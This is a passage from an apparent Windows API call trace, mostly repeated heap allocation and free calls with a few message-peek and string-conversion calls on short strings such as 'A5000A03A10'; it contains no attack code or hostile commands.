out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0162.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0162.793] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0162.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0162.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0162.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0162.794] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0162.794] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0162.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0162.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0162.795] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0162.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x34a00b0 [0162.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0162.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0162.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0162.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0162.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x34a0080, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0162.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0162.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0162.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0162.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0162.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0162.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0162.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0162.797] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0162.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0162.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0162.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0162.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0162.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0162.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0162.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0162.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x34a00a0 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0162.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0162.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0162.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0162.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0162.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0162.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0162.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0162.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0162.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b2bb8 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0162.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0162.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0162.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x34a0080, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x34a0060 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0162.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0162.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0162.802] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.802] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.802] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0162.803] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0162.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) 